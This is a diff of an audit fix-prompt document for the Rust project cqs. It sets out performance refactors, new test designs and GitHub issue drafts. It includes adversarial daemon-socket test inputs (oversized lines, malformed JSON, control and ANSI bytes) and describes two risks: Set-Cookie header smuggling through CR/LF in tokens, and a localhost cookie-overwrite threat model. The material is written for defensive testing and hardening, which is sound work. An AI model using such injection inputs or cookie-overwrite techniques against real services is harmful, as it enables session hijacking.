+### Replacement
+```rust
+crate::fs::atomic_replace(&final_path, contents.as_bytes())?;
+```
+Drop the bespoke temp+rename block from each function. ~20 LOC each.
+
+---
+
+## P3.40 — `update_umap_coords_batch`: DROP TEMP TABLE before CREATE
+
+**Finding:** P3.40
+**Files:** `src/store/chunks/crud.rs:392-450`
+**Why:** TEMP TABLE is connection-scoped, not transaction-scoped; rollback can leave a stale `_update_umap` between calls on the same pooled connection.
+
+### Current code
+```rust
+sqlx::query("CREATE TEMP TABLE IF NOT EXISTS _update_umap (...)").execute(&mut *tx).await?;
+sqlx::query("DELETE FROM _update_umap").execute(&mut *tx).await?;
+// ... INSERT INTO _update_umap, UPDATE chunks FROM _update_umap, DROP TABLE IF EXISTS _update_umap;
+```
+
+### Replacement
+```rust
+sqlx::query("DROP TABLE IF EXISTS _update_umap").execute(&mut *tx).await?;
+sqlx::query("CREATE TEMP TABLE _update_umap (...)").execute(&mut *tx).await?;
+// no DELETE needed; INSERT INTO _update_umap proceeds cleanly
+```
+
+---
+
+## P3.41 — `reindex_files`: build embeddings without placeholders
+
+**Finding:** P3.41
+**Files:** `src/cli/watch.rs:2918-2924`
+**Why:** Allocates N empty `Embedding::new(vec![])` placeholders then overwrites each — pure waste plus a future zero-norm-vector landmine.
+
+### Current code
+```rust
+let mut embeddings: Vec<Embedding> = vec![Embedding::new(vec![]); chunk_count];
+for (i, e) in cached { embeddings[i] = e; }
+for (i, e) in new_embeddings { embeddings[i] = e; }
+```
+
+### Replacement
+Mirror the bulk-pipeline pattern (`src/cli/pipeline/embedding.rs::create_embedded_batch`):
+```rust
+let mut by_index: HashMap<usize, Embedding> = HashMap::with_capacity(chunk_count);
+for (i, e) in cached { by_index.insert(i, e); }
+for (i, e) in new_embeddings { by_index.insert(i, e); }
+let embeddings: Vec<Embedding> = (0..chunk_count)
+    .map(|i| by_index.remove(&i)
+        .unwrap_or_else(|| panic!("missing embedding at index {i}")))
+    .collect();
+```
+(Or refactor to call `create_embedded_batch` directly if its signature fits.)
+
+---
+
+## P3.42 — `prepare_for_embedding`: skip store query when global cache satisfies all
+
+**Finding:** P3.42
+**Files:** `src/cli/pipeline/embedding.rs:64-82`
+**Why:** Always issues `store.get_embeddings_by_hashes` even when global cache has every entry; one wasted bind-heavy SELECT per warm reindex.
+
+### Current code (sketch)
+```rust
+let global_hits = global_cache.read_batch(&hashes, ...)?;
+let store_hits = store.get_embeddings_by_hashes(&hashes)?; // unconditional
+```
+
+### Replacement
+```rust
+let global_hits = global_cache.read_batch(&hashes, ...)?;
+let missed: Vec<&str> = hashes.iter()
+    .filter(|h| !global_hits.contains_key(h.as_str()))
+    .map(|h| h.as_str()).collect();
+let store_hits = if missed.is_empty() {
+    HashMap::new()
+} else {
+    store.get_embeddings_by_hashes(&missed)?
+};
+```
+
+---
+
+## P3.43 — Daemon socket: fold args validation + extraction into one pass
+
+**Finding:** P3.43
+**Files:** `src/cli/watch.rs:266-297`
+**Why:** Every daemon query walks the args array twice (validation + extraction). Single pass collects both.
+
+### Current code
+```rust
+let bad_arg_indices: Vec<usize> = arr.iter().enumerate()
+    .filter_map(|(i, v)| (!v.is_string()).then_some(i)).collect();
+if !bad_arg_indices.is_empty() { /* reject */ }
+let args: Vec<String> = arr.iter()
+    .filter_map(|v| v.as_str().map(String::from)).collect();
+```
+
+### Replacement
+```rust
+let mut args = Vec::with_capacity(arr.len());
+let mut bad_arg_indices = Vec::new();
+for (i, v) in arr.iter().enumerate() {
+    match v.as_str() {
+        Some(s) => args.push(s.to_string()),
+        None => bad_arg_indices.push(i),
     }
-    self.query_count.fetch_add(1, Ordering::Relaxed);
-    // ... rest of dispatch_line body with `tokens` instead of re-split
 }
+if !bad_arg_indices.is_empty() { /* reject as before */ }
 ```
-
-Update the daemon call site in watch.rs:315-331 to call `dispatch_tokens(&command, &args, &mut output)` instead of joining then re-splitting.
-
-**Why**: Every daemon query does `shell_words::join(&args)` then `dispatch_line` does `shell_words::split(&full_line)` — round-trip serialization that can fail on edge-case tokens (pointed out as a latent correctness bug) and is pure waste on the hot path.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test daemon_forward_test`. Bench: `cqs ping` loop before/after.
 
 ---
 
-### RM-V1.29-1: `load_references` bypasses LRU
+## P3.44 — `build_graph` edge dedup with hashed key
 
-**File**: `/mnt/c/Projects/cqs/src/cli/batch/handlers/search.rs` + `src/reference.rs`
+**Finding:** P3.44
+**Files:** `src/serve/data.rs:367-373`
+**Why:** `(file.clone(), caller.clone(), callee.clone())` allocates 3 Strings per row even on dedup miss. Hash to u64 instead.
 
-**Current code** (batch/handlers/search.rs:283-308):
+### Current code
 ```rust
-let results = if args.include_refs {
-    let config = cqs::config::Config::load(&ctx.root);
-    let references = cqs::reference::load_references(&config.references);
-    // ... rayon par_iter over every reference, fresh Store + fresh HNSW per call
+let key = (file.clone(), caller_name.clone(), callee_name.clone());
+if seen.insert(key) {
+    accum.push((file, caller_name, callee_name));
+}
 ```
 
-And `src/reference.rs:194-224` — `load_references` builds a fresh rayon pool + loads every ref from scratch per call.
-
-**Fix**:
-
-Cache loaded references on `BatchContext` so a daemon session amortizes the ref-load cost. `BatchContext` already has a `refs` RefCell slot per `invalidate_mutable_caches` at batch/mod.rs:504. Audit what populates it — if nothing currently does, wire it here:
-
+### Replacement
 ```rust
-// In src/cli/batch/handlers/search.rs:
-let references = ctx.borrow_refs_or_load(|root| {
-    let config = cqs::config::Config::load(root);
-    cqs::reference::load_references(&config.references)
-})?;
+use std::hash::{Hash, Hasher};
+use std::collections::hash_map::DefaultHasher;
+let mut h = DefaultHasher::new();
+file.hash(&mut h); caller_name.hash(&mut h); callee_name.hash(&mut h);
+if seen.insert(h.finish()) {
+    accum.push((file, caller_name, callee_name));
+}
 ```
-
-Add the accessor on `BatchContext` (`borrow_refs_or_load<F>(f: F) -> Result<Ref<'_, Vec<ReferenceIndex>>>`) that lazily populates on first call and returns a borrow. Invalidate on `invalidate_mutable_caches` (already listed at :504).
-
-For `load_references` itself: thread an optional rayon pool argument so the caller can reuse an existing pool. For daemon, build the pool once at BatchContext construction; sequential CLI path keeps the current one-shot behavior.
-
-**Why**: With N references and M queries per daemon session, we do `O(N*M)` Store opens + HNSW loads instead of `O(N+M)`. Reported latency on a 4-reference setup: 2-3s per `--include-refs` query vs sub-200ms when cached.
-
-**Verify**: `cargo build --features gpu-index`. Bench `cqs search foo --include-refs` in a daemon session loop; first call warms, subsequent calls should be 10× faster.
+Change `seen` type from `HashSet<(String,String,String)>` to `HashSet<u64>`.
 
 ---
 
-### EX-V1.29-5: NotesListArgs / NotesCommand::List drift
+## P3.45 — `extract_imports`: borrow keys, allocate only on accept
 
-**File**: `/mnt/c/Projects/cqs/src/cli/args.rs` + `src/cli/commands/io/notes.rs`
+**Finding:** P3.45
+**Files:** `src/where_to_add.rs:258-276`
+**Why:** `seen.insert(trimmed.to_string())` per candidate line allocates even on rejection.
 
-**Current code**: two hand-maintained arg structs (see API-V1.29-4 above).
-
-**Fix**:
-
-Consolidate: have `NotesCommand::List` embed `NotesListArgs` via `#[command(flatten)]` + the extra `output: TextJsonArgs`. Draft:
-
+### Current code
 ```rust
-// In src/cli/commands/io/notes.rs:
-List {
-    #[command(flatten)]
-    list: crate::cli::args::NotesListArgs,
-    #[command(flatten)]
-    output: TextJsonArgs,
+let mut seen: HashSet<String> = HashSet::new();
+let mut imports: Vec<String> = Vec::new();
+for chunk in chunks {
+    for line in chunk.content.lines() {
+        let trimmed = line.trim();
+        for &prefix in prefixes {
+            if trimmed.starts_with(prefix) && imports.len() < max
+                && seen.insert(trimmed.to_string()) {
+                imports.push(trimmed.to_string());
+                break;
+            }
+        }
+    }
 }
 ```
 
-Remove the now-duplicate fields. Update `cmd_notes` match arm to `ctx.list.warnings`, `ctx.list.patterns`, `ctx.list.check` (after API-V1.29-4 adds `check` to `NotesListArgs`).
-
-**Why**: API-V1.29-4 is a symptom of this drift. Rather than fix each field addition in two places, unify the source of truth.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_notes_test`.
-
----
-
-### TC-HAP-1.29-1: Serve endpoints never tested with data
-
-**File** (new): `/mnt/c/Projects/cqs/tests/serve_endpoints_test.rs`
-
-**Design spec**:
-
-Create a new integration test file exercising `build_graph`, `build_hierarchy`, `build_cluster`, and `build_chunk_detail` against a populated `Store<ReadOnly>`.
-
-**Seed fixture shape** (shared helper in `tests/common/`):
-- 20 chunks across 5 files (function, struct, trait, const, test kinds mixed).
-- 30 function_calls edges forming a small DAG (some diamond patterns, some self-loops, one cycle).
-- Deterministic chunk ids + names.
-- Optional: 2 chunks with zero callers (dead), 1 chunk with 10 callers (hotspot).
-
-**Test cases to stub** (one per endpoint, pairs of capped + uncapped):
+### Replacement
 ```rust
-#[test]
-fn build_graph_returns_all_chunks_when_uncapped() { ... }
-
-#[test]
-fn build_graph_respects_max_nodes_cap() {
-    // assert response.nodes.len() == cap
-    // assert the TOP cap nodes by n_callers_global are present
-}
-
-#[test]
-fn build_graph_file_filter_restricts_to_origin() { ... }
-
-#[test]
-fn build_graph_kind_filter_restricts_to_chunk_type() { ... }
-
-#[test]
-fn build_hierarchy_callers_direction_from_leaf() { ... }
-
-#[test]
-fn build_hierarchy_callees_direction_from_root() { ... }
-
-#[test]
-fn build_hierarchy_max_depth_bounds_bfs() { ... }
-
-#[test]
-fn build_hierarchy_returns_none_for_unknown_root_id() { ... }
-
-#[test]
-fn build_cluster_returns_language_groups() { ... }
-
-#[test]
-fn build_chunk_detail_returns_callers_and_callees_lists() { ... }
-
-#[test]
-fn build_chunk_detail_returns_none_for_unknown_id() { ... }
-```
-
-Use `tests/common/fixtures.rs` patterns: a `TempProject::with_seeded_graph()` builder that populates the store via `store.upsert_chunks_and_calls(...)` directly (skip the parser/embedder path — these tests exercise the serve data layer, not the pipeline).
-
-**Why**: All four `build_*` functions are tested only for empty-store cases in existing suites (verified via `grep -n 'build_graph\|build_hierarchy\|build_cluster\|build_chunk_detail' tests/*.rs`). The SEC-4 IN-list overflow fix and DS2-4 race both regress silently without populated-data tests.
-
-**Verify**: `cargo test --features gpu-index --test serve_endpoints_test`.
-
----
-
-### TC-HAP-1.29-2: 16 batch dispatch handlers untested
-
-**Files** to touch: existing `tests/cli_surface_test.rs` or new `tests/batch_dispatch_test.rs`
-
-**Design spec**:
-
-Existing `dispatch_drift`, `dispatch_diff`, `dispatch_notes`, etc. in `src/cli/batch/handlers/*.rs` have zero end-to-end tests. Spawn `cqs batch` with a line-oriented stdin script and assert the JSON envelopes on stdout.
-
-**Test file structure**:
-```rust
-// tests/batch_dispatch_test.rs
-mod common;
-use common::TempProject;
-
-fn batch_script(project: &TempProject, lines: &[&str]) -> Vec<serde_json::Value> {
-    let mut cmd = cqs_binary_command(); // existing helper
-    cmd.arg("batch").current_dir(project.path());
-    let stdin_input = lines.join("\n");
-    let output = cmd
-        .stdin_buf(stdin_input)
-        .output()
-        .expect("batch should run");
-    output
-        .stdout
-        .lines()
-        .filter_map(|l| serde_json::from_str(&l.ok()?).ok())
-        .collect()
-}
-
-#[test]
-fn dispatch_gather_returns_envelope() { ... }
-
-#[test]
-fn dispatch_scout_returns_envelope() { ... }
-
-#[test]
-fn dispatch_task_returns_envelope() { ... }
-
-#[test]
-fn dispatch_where_returns_envelope() { ... }
-
-#[test]
-fn dispatch_onboard_returns_envelope() { ... }
-
-#[test]
-fn dispatch_callers_returns_envelope() { ... }
-
-#[test]
-fn dispatch_callees_returns_envelope() { ... }
-
-#[test]
-fn dispatch_impact_returns_envelope() { ... }
-
-#[test]
-fn dispatch_test_map_returns_envelope() { ... }
-
-#[test]
-fn dispatch_explain_returns_envelope() { ... }
-
-#[test]
-fn dispatch_related_returns_envelope() { ... }
-
-#[test]
-fn dispatch_similar_returns_envelope() { ... }
-
-#[test]
-fn dispatch_dead_returns_envelope() { ... }
-
-#[test]
-fn dispatch_diff_returns_envelope() { ... }
-
-#[test]
-fn dispatch_drift_returns_envelope() { ... }
-
-#[test]
-fn dispatch_context_returns_envelope() { ... }
-```
-
-Each test: seed a small project (fixture from `tests/common/fixtures.rs`), index it, spawn `cqs batch` with one input line, assert the emitted envelope has the right shape (`data` field present, not null, matches the expected handler's output struct).
-
-**Why**: 16 handlers are reachable only via batch/daemon; CLI variants are well-tested but daemon wiring is frequently where regressions hide (see PR #1047, #1050 history of dispatch bugs).
-
-**Verify**: `cargo test --features gpu-index --test batch_dispatch_test`.
-
----
-
-### TC-ADV-1.29-3: Daemon socket adversarial tests
-
-**File** (new): `/mnt/c/Projects/cqs/tests/daemon_socket_adversarial_test.rs`
-
-**Design spec**:
-
-Spawn `cqs watch --serve` against a temp project, open a Unix-socket connection, send adversarial payloads, assert the daemon (a) doesn't panic, (b) emits a structured error envelope, (c) keeps serving subsequent legitimate queries.
-
-**Test cases to stub**:
-```rust
-#[test]
-#[cfg(unix)]
-fn daemon_rejects_line_over_1mib_boundary() {
-    let project = TempProject::seeded();
-    let daemon = SpawnDaemon::start(&project);
-    let mut stream = daemon.connect();
-    let payload = "a".repeat(1_048_577);  // 1 MiB + 1 byte
-    stream.write_all(payload.as_bytes()).unwrap();
-    let resp = read_envelope(&mut stream);
-    assert_eq!(resp["error"]["code"], "INVALID_INPUT");
-    // Sanity: daemon still alive for follow-up
-    assert!(ping(&daemon).is_ok());
-}
-
-#[test]
-#[cfg(unix)]
-fn daemon_rejects_nul_byte_in_args() {
-    let payload = r#"{"command":"stats","args":["foo bar"]}"#;
-    // ... assert INVALID_INPUT envelope, daemon still alive
-}
-
-#[test]
-#[cfg(unix)]
-fn daemon_rejects_malformed_json_not_crash() {
-    // Send `{ not valid json at all `
-    // Assert PARSE_ERROR envelope
-}
-
-#[test]
-#[cfg(unix)]
-fn daemon_rejects_args_array_over_1024_elements() {
-    // Send a "command":"stats" with 10_000 args
-    // Assert INVALID_INPUT or a reasonable cap
-}
-
-#[test]
-#[cfg(unix)]
-fn daemon_handles_partial_read_and_disconnect() {
-    // Write half a line, close socket
-    // Assert daemon doesn't panic, next connection works
-}
-
-#[test]
-#[cfg(unix)]
-fn daemon_rejects_ansi_bel_cr_in_command() {
-    // Command with \x07 (BEL), \x0D (CR), \x1b[ (ANSI ESC)
-    // Assert INVALID_INPUT envelope
+let mut seen: HashSet<&str> = HashSet::new();
+let mut imports: Vec<String> = Vec::new();
+for chunk in chunks {
+    for line in chunk.content.lines() {
+        let trimmed = line.trim();
+        for &prefix in prefixes {
+            if trimmed.starts_with(prefix) && imports.len() < max
+                && seen.insert(trimmed) {
+                imports.push(trimmed.to_string());
+                break;
+            }
+        }
+    }
 }
 ```
 
-Shared helpers (`tests/common/daemon.rs`):
-- `SpawnDaemon::start(project)` — launches `cqs watch --serve` with a temp `XDG_RUNTIME_DIR`, waits for socket bind, returns handle with cleanup Drop.
-- `read_envelope(&mut stream)` — reads one line, parses as envelope JSON.
-- `ping(daemon)` — sends `{"command":"ping"}`, asserts 200-like envelope.
+---
 
-**Why**: Daemon socket is the first long-lived network-adjacent surface in cqs; zero adversarial coverage = first SEC-1-class bug ships unnoticed.
+## P3.46 — Watch reindex: `existing.remove` instead of `.get().clone()`
 
-**Verify**: `cargo test --features gpu-index --test daemon_socket_adversarial_test`.
+**Finding:** P3.46
+**Files:** `src/cli/watch.rs:2879-2887`
+**Why:** Per cache hit clones a 4 KB `Embedding` (1024-dim). `.remove()` takes ownership.
+
+### Current code
+```rust
+let existing = store.get_embeddings_by_hashes(&hashes)?;
+for (i, chunk) in chunks.iter().enumerate() {
+    if let Some(emb) = existing.get(&chunk.content_hash) {
+        cached.push((i, emb.clone()));
+    } else {
+        to_embed.push((i, chunk));
+    }
+}
+```
+
+### Replacement
+```rust
+let mut existing = store.get_embeddings_by_hashes(&hashes)?;
+for (i, chunk) in chunks.iter().enumerate() {
+    if let Some(emb) = existing.remove(&chunk.content_hash) {
+        cached.push((i, emb));
+    } else {
+        to_embed.push((i, chunk));
+    }
+}
+```
 
 ---
 
-## Execution rules for the agent fixing P2
+## P3.47 — `LocalProvider` worker thread stack 512 KB
 
-- Same re-read-then-edit discipline as P1.
-- Group by file so a single fix touches one module (e.g., PB-V1.29-1 touches both context.rs and brief.rs — do together).
-- Documentation fixes (DOC-V1.29-1, -3, -4) can be batched in one commit.
-- Test-coverage items (TC-HAP-1.29-1, -2, TC-ADV-1.29-3) each deserve their own commit; they add new test files and shouldn't be mixed with code fixes.
-- `cargo fmt && cargo build --features gpu-index` after each cluster.
-- Run the named test-file target after each cluster (avoid the full suite — it's ~90s and most P2s don't need it).
-- When all P2 are done: full `cargo test --features gpu-index --lib` + `cargo test --features gpu-index --tests` once for regression catch.
+**Finding:** P3.47
+**Files:** `src/llm/local.rs:163-256`
+**Why:** Default 2 MB stack × concurrency=64 = 128 MB just for the fan-out. Worker body is shallow.
+
+### Current code (sketch)
+```rust
+std::thread::scope(|s| {
+    for _ in 0..workers {
+        s.spawn(|| { /* recv → http → parse → mutex.insert */ });
+    }
+});
+```
+
+### Replacement
+Switch to `Builder`-based threads with manual join, since `std::thread::scope::Scope::spawn` lacks a stack-size hook:
+```rust
+let mut handles = Vec::with_capacity(workers);
+for i in 0..workers {
+    let h = std::thread::Builder::new()
+        .name(format!("cqs-llm-worker-{i}"))
+        .stack_size(512 * 1024)
+        .spawn(/* worker closure */)?;
+    handles.push(h);
+}
+for h in handles { let _ = h.join(); }
+```
+Adjust the captured borrows to be `Arc`-cloned since we're outside `scope`. Drop the upper concurrency clamp from 64 to 16 in `local_concurrency()` while you're there.
+
+---
+
+## P3.48 — `LocalProvider::http`: cap idle pool
+
+**Finding:** P3.48
+**Files:** `src/llm/local.rs:97-100`
+**Why:** Default reqwest pool = unbounded idle, 90 s timeout. Long indexing runs leak idle slots into vLLM/llama.cpp.
+
+### Current code
+```rust
+Client::builder()
+    .timeout(timeout)
+    .redirect(Policy::none())
+    .build()?
+```
+
+### Replacement
+```rust
+Client::builder()
+    .timeout(timeout)
+    .redirect(Policy::none())
+    .pool_max_idle_per_host(self.concurrency)
+    .pool_idle_timeout(Duration::from_secs(30))
+    .build()?
+```
+
+---
+
+## P3.49 — `cmd_similar` (CLI) integration test
+
+**Finding:** P3.49
+**Files:** `src/cli/commands/search/similar.rs:41`
+**Why:** Library `find_similar` is tested; the CLI wrapper (target lookup + pattern filter + JSON build) is not.
+
+### Replacement
+Add to `src/cli/commands/search/similar.rs::tests` (or new `tests/cli_similar_test.rs` if `cmd_similar` is hard to drive in-process):
+```rust
+#[test]
+fn cmd_similar_returns_other_seeded_chunks() {
+    let fix = common::InProcessFixture::new();
+    fix.seed_chunks(&[("foo", "fn foo() { bar(); }"),
+                      ("bar", "fn bar() { 1+1; }"),
+                      ("baz", "fn baz() { unrelated(); }")]);
+    let mut sink = Vec::<u8>::new();
+    let ctx = fix.command_context_with_json_sink(&mut sink);
+    cmd_similar(&ctx, "foo", /*limit*/ 2).unwrap();
+    let json: serde_json::Value = serde_json::from_slice(&sink).unwrap();
+    let names: Vec<&str> = json["data"]["results"].as_array().unwrap().iter()
+        .map(|r| r["name"].as_str().unwrap()).collect();
+    assert!(names.contains(&"bar"));
+    assert!(!names.contains(&"foo")); // self excluded
+}
+```
+
+---
+
+## P3.50 — `cmd_ci` happy-path test
+
+**Finding:** P3.50
+**Files:** `src/cli/commands/review/ci.rs:9` + `tests/cli_train_review_test.rs` (or new `tests/cli_ci_test.rs`)
+**Why:** Existing tests cover error paths only; markdown formatting + exit-code mapping for a real diff are unpinned.
+
+### Replacement
+Add a test that feeds a real unified diff touching a hotspot function in an `InProcessFixture`-seeded corpus:
+```rust
+#[test]
+fn cmd_ci_high_risk_diff_emits_high_risk_section_and_nonzero_exit() {
+    let fix = common::InProcessFixture::new();
+    fix.seed_chunks(&[("hotspot", "fn hotspot() { /* many callers */ }")]);
+    fix.seed_callers("hotspot", 12); // synthetic call edges
+    let diff = "--- a/src/lib.rs\n+++ b/src/lib.rs\n@@ -1,3 +1,3 @@\n \
+                fn hotspot() {\n-    do_old();\n+    do_new();\n }\n";
+    let mut stdout = Vec::<u8>::new();
+    let exit = cmd_ci_with_input(&fix.context(), diff, &mut stdout).unwrap();
+    let out = String::from_utf8(stdout).unwrap();
+    assert!(out.contains("High-risk"));
+    assert_ne!(exit, 0);
+}
+```
+
+---
+
+## P3.51 — `cmd_gather` (CLI) integration test
+
+**Finding:** P3.51
+**Files:** `src/cli/commands/search/gather.rs:77`
+**Why:** Library `gather()` is tested; CLI-only steps (`--max-files` clamp, content injection, token-budget trim) are not.
+
+### Replacement
+Add `tests/cli_gather_test.rs`:
+```rust
+#[test]
+fn cli_gather_clamps_max_files_and_injects_content() {
+    let fix = common::InProcessFixture::new();
+    fix.seed_chunks(&[/* 5 chunks across 5 files */]);
+    let out = cqs(&["gather", "needle", "--json", "--max-files", "2"]).output();
+    let json: serde_json::Value = serde_json::from_slice(&out.stdout).unwrap();
+    let groups = json["data"]["results"].as_array().unwrap();
+    assert_eq!(groups.len(), 2);                              // clamp
+    assert!(groups[0]["content"].as_str().unwrap().len() > 0); // content injected
+}
+```
+
+---
+
+## P3.52 — `dispatch_line` happy-path test for a valid command
+
+**Finding:** P3.52
+**Files:** `src/cli/batch/mod.rs:557` (`dispatch_line`); test block in same file
+**Why:** Existing tests are all error/adversarial. A success-envelope shape regression would slip through.
+
+### Replacement
+Add to `src/cli/batch/mod.rs::tests`:
+```rust
+#[test]
+fn test_dispatch_line_stats_emits_success_envelope() {
+    let fix = common::InProcessFixture::new();
+    let mut ctx = fix.batch_context();
+    let mut sink = Vec::<u8>::new();
+    ctx.dispatch_line("stats", &mut sink).unwrap();
+    let line = std::str::from_utf8(&sink).unwrap().lines().next().unwrap();
+    let v: serde_json::Value = serde_json::from_str(line).unwrap();
+    assert!(v["error"].is_null());
+    assert!(v["data"]["total_chunks"].is_number());
+}
+```
+
+---
+
+## P3.53 — `select_provider` / `detect_provider` direct tests
+
+**Finding:** P3.53
+**Files:** `src/embedder/provider.rs:171, 188, 258`; new `#[cfg(test)] mod tests` (overlaps P3.16; consolidate)
+**Why:** #1120's provider split has zero tests for the cache-on-first-call invariant or the priority list.
+
+### Replacement
+Add to `src/embedder/provider.rs::tests` (alongside the P3.16 tests):
+```rust
+#[test]
+fn select_provider_caches_first_call() {
+    // OnceCell semantics — first call wins, second returns same value.
+    let p1 = select_provider();
+    let p2 = select_provider();
+    assert_eq!(format!("{p1:?}"), format!("{p2:?}"));
+}
+
+#[cfg(not(any(feature = "cuda-index", feature = "ep-coreml", feature = "ep-rocm")))]
+#[test]
+fn detect_provider_returns_cpu_when_no_features() {
+    // Pure-CPU build must yield the CPU branch.
+    assert!(matches!(detect_provider(), ExecutionProvider::CPU));
+}
+```
+(Add a `cuda-index`-gated test that asserts CUDA selection on a CUDA build if the runtime has a GPU; otherwise skip.)
+
+---
+
+# P4 — GitHub Issues (paste-ready)
+
+## P4.1 — AuthToken alphabet invariant via type-state
+
+**Disposition:** GitHub issue
+**Files:** `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:218-220` (`HeaderValue::from_str(&cookie).expect(…)`)
+
+### Issue body (paste-ready)
+
+**Title:** auth: harden AuthToken alphabet invariant via type-state, not docstring
+
+**Body:**
+
+> `AuthToken::from_string` is currently `#[cfg(test)]` so production code cannot construct a token with arbitrary bytes. The contract that the alphabet is URL-safe base64 (and that `HeaderValue::from_str(&cookie)` therefore cannot fail) is enforced only by the docstring on `random()`. The `.expect(…)` at `auth.rs:218` is a real panic if the invariant ever fails.
+>
+> If a future feature lifts the cfg-gate (e.g. "stable token from env var" for scripted automation) and the env var contains CR/LF, `;`, or `,`, the worker panics on every redirect or smuggles a second cookie pair into the `Set-Cookie` header. Today the path is unreachable from outside tests, but the type does not enforce the invariant; one cfg-gate change is all it takes.
+>
+> **Why deferred:** a clean fix is a type-state refactor — wrap the inner `String` in a `pub struct AuthToken(String)` newtype constructed only via `random()` / a validated `from_str_validated`. Both constructors verify `[A-Za-z0-9_-]{32,}` and panic at construction, not at use. That changes the `pub` surface of the `auth` module and ripples into every test that builds tokens by hand.
+>
+> **Pointers:**
+> - construction sites: `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:60-72` (`random`)
+> - panic site that would convert into a real safety proof: `src/serve/auth.rs:218-220`
+> - test usage to migrate: search `AuthToken::from_string` under `src/serve/`
+
+---
+
+## P4.2 — Path=/ cookie scope on 127.0.0.1 — multi-instance hijack
+
+**Disposition:** GitHub issue
+**Files:** `src/serve/auth.rs:211-214` (`Set-Cookie: cqs_token={token}; Path=/; HttpOnly; SameSite=Strict`)
+
+### Issue body (paste-ready)
+
+**Title:** serve: localhost cookie collision when running multiple `cqs serve` instances
+
+**Body:**
+
+> Browsers scope cookies by `(host, path)` but **not by port**. Two `cqs serve` instances on the same machine but different ports (project A on 8080, project B on 8081) both set `cqs_token` with `Path=/`. Authenticating to one overwrites the cookie set by the other; the previously-authenticated tab silently 401s on every navigation, and (worse) any link sends the wrong token to the wrong server.
+>
+> Threat model: an attacker who can convince a victim to run `cqs serve` against a malicious project on a port the attacker controls can drop any cookie they like into the victim's localhost cookie jar — combined with `SameSite=Strict`-bypass via top-level navigation, this is a real cookie-jar overwrite vector.
+>
+> **Steps:**
+> 1. Run `cqs serve --port 8080` in project A; auth via the browser banner.
+> 2. Run `cqs serve --port 8081` in project B; auth via the browser banner.
+> 3. Reload project A's tab — every request now 401s because the project B token clobbered it.
+>
+> **Why deferred:** clean fixes all have trade-offs. `__Host-` cookie prefix requires `Secure`, which loopback HTTP doesn't satisfy. Port-suffixed cookie names (`cqs_token_8080`) increase knob count and break URL-bar bookmarks across launches when the port floats. Path-rewriting (`Path=/api/__cqs_<port>/`) is heavy. Pragmatic option: derive cookie name from a hash of `(bind_addr, launch_time)` so two instances don't collide and a new launch invalidates the old cookie — but that changes the CLI launch banner (the printed token URL must include the cookie-name salt) and requires a one-time UX audit.
+>
+> **Pointers:**
+> - cookie set: `src/serve/auth.rs:211-214`
+> - cookie read: `src/serve/auth.rs:158-172` (`check_request`)
+> - launch-banner path: `src/serve/mod.rs:111-117`
+> - existing acknowledgement of the issue: `src/serve/auth.rs:42-47`
+
+---
+
+## P4.3 — `Option<AuthToken>` permits silent no-auth router
+
+**Disposition:** GitHub issue
+**Files:** `src/serve/mod.rs:78-83` (`run_server` signature), `src/serve/mod.rs:154-178` (`build_router`)
+
+### Issue body (paste-ready)
+
+**Title:** serve: type-state `AuthMode` to prevent silently building a no-auth router
+
+**Body:**
+
+> `run_server` and `build_router` both take `auth: Option<AuthToken>`. Passing `None` silently disables auth — there is no compile-time gate. The `cmd_serve` entry path correctly defaults to `Some(random())` and only opts into `None` on `--no-auth`, but the type does not constrain future internal callers (an embedded smoke test, a feature-gated dev mode, an alternate CLI surface) from passing `None` and shipping a fully open server. The only runtime signal is an `eprintln!` gated on `quiet == false` (`mod.rs:120-123`).
+>
+> Today `run_server(store, addr, /* quiet */ true, /* auth */ None)` ships a wide-open server with zero output. The "default secure" property lives in convention, not in the type system. The equivalent invariant in `cqs ref add` is enforced by validate-by-construction; here it is not.
+>
+> **Why deferred:** the clean fix is a type-state refactor — replace `Option<AuthToken>` with `enum AuthMode { Required(AuthToken), Disabled { ack: NoAuthAcknowledgement } }` where `NoAuthAcknowledgement` is a `pub` zero-sized type only constructable inside `cmd_serve` after the `--no-auth` flag is parsed. Future internal callers cannot instantiate the disabled variant without intentionally importing the proof type. This ripples into every test that builds a router today via `build_router(.., None)` and the public-ish `run_server` signature.
+>
+> **Cheaper interim mitigation** (one-line, can land before the refactor): in the `None` arm of `build_router` add a `tracing::error!("serve: AUTH DISABLED — request layer is open")` so any caller (test or future) shows up loudly in journald. Not a substitute for the type-state fix; just blast-radius limiter.
+>
+> **Pointers:**
+> - signature: `src/serve/mod.rs:78-83`
+> - router construction: `src/serve/mod.rs:154-178`
+> - the only caller that legitimately passes `None`: `src/cli/commands/serve.rs:61-65` (after `--no-auth` parse)
+> - banner suppression: `src/serve/mod.rs:120-123`
+
+---

--- a/docs/audit-fix-prompts.md
+++ b/docs/audit-fix-prompts.md
@@ -1,7560 +1,7069 @@
-# v1.30.0 Audit — P1 Fix Prompts
+# v1.30.1 Audit Fix Prompts
 
-21 fix prompts for the P1 (easy + high-impact) findings. Verified against current source 2026-04-26.
+Generated: 2026-04-28T19:08:55Z
 
-Notes on drift:
-- P1.16 — `--name-boost` CLI parser is already `parse_unit_f32` (clap-bounded). The audit text was stale; only the **defense-in-depth** clamp at the consumer remains.
-- All other P1 line citations verified to current source.
+# v1.30.1 Audit — P1 Fix Prompts
 
----
+10 fix prompts covering the 14 P1 findings (after grouping). All line citations verified against current source 2026-04-28.
 
-## P1.1 + P1.2 — PRIVACY/SECURITY lie about query_log opt-in and query_cache TTL
+Group map (audit IDs → prompt #):
+- P1.1: CQ-V1.30.1-2 + DS-V1.30.1-D6 + TC-ADV-1.30.1-8 (single state-machine + test fix)
+- P1.2: CQ-V1.30.1-1 + AC-V1.30.1-4 + DS-V1.30.1-D8 (single reset-ordering fix)
+- P1.3: CQ-V1.30.1-4 + AC-V1.30.1-5 (auth ladder rewrite — strip ordering + case-fold)
+- P1.4: DOC-V1.30.1-1 (PRIVACY/SECURITY cache key)
+- P1.5: SEC-V1.30.1-2 (symlink-behaviour matrix)
+- P1.6: SEC-V1.30.1-1 (read --focus / context trust_level — depends on type extension)
+- P1.7: DOC-V1.30.1-7 (SECURITY auth surface backfill)
+- P1.8: DOC-V1.30.1-4 (ROADMAP #1182 closed)
+- P1.9: SHL-V1.30-1 (`embed_batch_size_for` wiring — 2 production sites)
